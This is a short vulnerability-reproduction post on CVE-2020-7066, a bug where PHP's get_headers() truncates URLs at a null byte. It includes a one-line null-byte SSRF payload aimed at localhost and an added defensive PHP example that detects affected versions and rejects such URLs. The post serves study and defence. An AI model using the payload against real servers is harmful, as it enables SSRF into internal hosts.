[Vulnerability Reproduction] CVE-2020-7066

Date: 2021-01-27 13:54:28


The get_headers() function in PHP 7.2.x before 7.2.29, 7.3.x before 7.3.16, and 7.4.x before 7.4.4 has a security vulnerability. It can be used to bypass a WAF and for SSRF.

get_headers()

 get_headers ( string $url , int $format = 0 , resource $context = ? ) : array

Example #1: using get_headers()

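<?php
$url = 'https://www.cnblogs.com/Ky1226/';
// Default format: numerically indexed list of header lines
print_r(get_headers($url));
// Format 1: associative array keyed by header name
print_r(get_headers($url, 1));
?>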

Output

Array ( 
[0] => HTTP/1.1 200 OK 
[1] => Date: Tue, 26 Jan 2021 11:28:56 GMT 
[2] => Content-Type: text/html; charset=utf-8 
[3] => Connection: close 
[4] => Vary: Accept-Encoding 
[5] => Strict-Transport-Security: max-age=2592000; includeSubDomains; preload ) 

Array ( 
[0] => HTTP/1.1 200 OK 
[Date] => Tue, 26 Jan 2021 11:28:56 GMT 
[Content-Type] => text/html; charset=utf-8 
[Connection] => close 
[Vary] => Accept-Encoding 
[Strict-Transport-Security] => max-age=2592000; includeSubDomains; preload ) 

Vulnerability reproduction

get_headers() truncates everything in the URL after a null character.

$_GET['url'] = "http://localhost\0.example.com";

Note that the \0 here is a "null character".
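
A defensive check for the truncation described above, as an added example that is not code from the original post: it contrasts a suffix-only check with one that rejects control characters before the URL reaches get_headers(). The helper names and ALLOWED_SUFFIX are assumptions, and the second sample URL is constructed.

```php
<?php
// Added example: helper names and ALLOWED_SUFFIX are hypothetical.
const ALLOWED_SUFFIX = '.example.com';

// True when the PHP version id falls in a range the page lists as affected.
function php_is_affected(int $id = PHP_VERSION_ID): bool
{
    return ($id >= 70200 && $id < 70229)
        || ($id >= 70300 && $id < 70316)
        || ($id >= 70400 && $id < 70404);
}

// Weak check: only looks at how the string ends, so the text after "\0"
// satisfies it even though an affected get_headers() never sees that part.
function naive_check(string $url): bool
{
    return substr($url, -strlen(ALLOWED_SUFFIX)) === ALLOWED_SUFFIX;
}

// Hardened check: refuse control characters first, then validate the parsed host.
function strict_check(string $url): bool
{
    if (preg_match('/[\x00-\x20\x7F]/', $url)) {
        return false; // NUL, CR/LF, whitespace, DEL
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = strtolower($parts['host']);
    return substr($host, -strlen(ALLOWED_SUFFIX)) === ALLOWED_SUFFIX;
}

$samples = [
    "http://localhost\0.example.com", // URL from the page
    "http://www.example.com",         // constructed benign URL
];
foreach ($samples as $url) {
    printf("%-36s naive=%s strict=%s\n",
        addcslashes($url, "\0"),
        var_export(naive_check($url), true),
        var_export(strict_check($url), true));
}
printf("PHP %s affected: %s\n", PHP_VERSION, var_export(php_is_affected(), true));
```

The URL from the page passes the suffix-only check and fails the strict one; the benign URL passes both.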

BUUCTF address
